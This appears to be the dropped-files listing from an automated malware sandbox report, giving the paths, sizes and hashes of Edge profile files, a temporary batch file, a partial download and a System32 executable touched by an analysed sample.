C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
9010fe212d7da97a4e9cf63a903ee7a4

SHA1
8f124a736d045eea3c50a9597d18c9af8b128e28

SHA256
c2956b77f9af9f4d79e0198d8a7e0a5b6f880b4d597dfeee25a3f56c05d11834

SHA512
f763ab3261592107fb19b7d6134c7f4d02e921258b1c72f1e0c69a95ee8ed9cc20498259a279cca9648bbd213a5234b965a9196865d465e1f975ee9242e36326

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
21320325bdfc20c6f4e4d136228fc9c5

SHA1
7e96950811d7ddbc1daeb7341ddb9768980bf2b5

SHA256
5e7ac2b978206a07d8b1841a2bd89eae4b466bcd8a0df3a62ae2ca0439b8bd5e

SHA512
ee78316d5b8edffdc83e3431bdbd28ae05a481d2a445ddf3b7c58bf0f01c6c42aead46a4d91e7fc75519a5ca8a7e2bab78749d88476c7a2fa0a25e8b3592bd43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
1357c2a60df0cbcdb45ce9d1f76df2fa

SHA1
4f0cfbf376543d4480733dc2aaa7d8ecb6b0a4fb

SHA256
ec78a3cf388cd27e2bf84b26205b61010227481d075cd11e8d117eedd75b960b

SHA512
373848fc5520ee07b5a686cb3bef73d2d2c4af44696476ce313b34309eef47774021a94d006f0f7cab00785340b16deb7845427c871c9fcbcd5807a3eee96f33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe582cf7.TMP

Filesize
1KB

MD5
35f89f9782f1a32bd2e721484ca30d91

SHA1
081635c32fee090388b76dc0bfb3cf463b637e2f

SHA256
39ede38b4a3cf6152f7b0ee1fbbe5f30930bfc6f11faf6be011ba98378e9161b

SHA512
d3bada0a2e26fb0fdf13d20db84a42f9eb041d9bac3e61f08630670fbdf571ec9bf7fceeb9bb3501686d81c68d8231a58c7f18e1901c3358a80b04886c9c0294

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
4daf712258a81e137a4af9d337b20bae

SHA1
e04101e81fe9081602a16bfb236fb0f9a3535d8b

SHA256
28ccf54ad730fbc2632c4d50a23c1a80f0cc9c18e62efa9b940d750cf1a48987

SHA512
6c00fac6cdabba06df01e1bf09b470e1ff138bc0305ff2308c43c8cbbbcb16c209cfc80b65cbb9c53c2e53eeee9b0f28b609d52e7392f894613ab060f9a6fd30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
da97a0dcb0cd2f7382ace6e96f228350

SHA1
5185221b4883bcac24a73fd1c9f1b996fb055320

SHA256
5b6175edccd42f164c0d105cc17115d95f96a5f8078fd1ffa1fb168e5ad66a3f

SHA512
4459c7d87892c110c2d6bd2316d5c60fa3945da9fe431aa7faa2771d955457db349202d97786b092bdcb083d8b1addde21051bcc8ee5bfc587522c3468072dad

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6F20.tmp.bat

Filesize
150B

MD5
31a460b3ec583849baefb6fbe1ccdd6a

SHA1
70725d515fc87316f508fcfe23e194f380fd481a

SHA256
d7d097fd9eac7c4857ea3f93774ca63cdbfcd44facc8181f9b7a1073f52d6704

SHA512
505dea912b61a89644fbba1ea95f03241ee8f55676ca0cec1363a6adda76de92ec58ec98c321080a5208b9e18fde07dd1cbc084e120eda74bc59c61d77b6bbee

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
0b80bb81abc53f113bd1e5f9614ba344

SHA1
bd1ea1ffdc229c90d34e45fceae7015156ad9c0c

SHA256
79e499d62572a4ec21dfab79c9033582b92bf643aa5a084f99d80f44cd81d809

SHA512
03139fec911bb390b66c1f9aa8b24138f4ce40c46d88f01aa8d888f293b48125cd2934a9701953ac218f9790651c7bcff5421e1240c6c12f014e8b15cab7920f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
0d87e0db8455805213fa517861c30099

SHA1
9b154ff2c74838cf37f5b21c6e6757479fabbfe2

SHA256
7e19a65fba4953a8f2dba114fd385f99372952d49c28e25c4357d6a3626be63c

SHA512
64892bf13c298fc96aa8ffa90a9ca1eb0874275ab7dc67984915f03249eb0c32e81ae88ab561d4c72190604ffc43a49583906171972b706e5382a574e8427df4

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 154464.crdownload

Filesize
3.5MB

MD5
2154ee33f499c84e8a3aa05c756c3661

SHA1
5ee6246f9a933bfea66169b320d44d368071663b

SHA256
da53d61b0b9fec82fd366712c56331ef5c4e6b381191a0a092717726586e7ecf

SHA512
a361b2c3624e7c97061ca72acde4720458d8950ff9a06723b5af7c792abd70388ad4f6f376e954fc8702e01c7a43c34a52283f5f52cff6cc1a96368f7d986b56

Download Submit
C:\Windows\System32\boot_cnfg_x32.exe

Filesize
48KB

MD5
8f601efcbf3eb183bbd6500296b9ccd2

SHA1
2542d3fe0e97fa969c0ef8e86676ba1c72e6e846

SHA256
5e4a8ebbeb1b7288087c65c0f5edf6d6016528f2bf5104cfc7fd5b315bf1affd

SHA512
d101aa1cc4281e29813aaa269b26d9e500a0ee042024273a636fc06d59d4af30d04d1670a58e54d3263cb6dfe9b67c71ef58c4175628841f2c8719260f548d08

Download Submit
memory/548-364-0x0000000000E40000-0x0000000000E52000-memory.dmp

Filesize
72KB

Download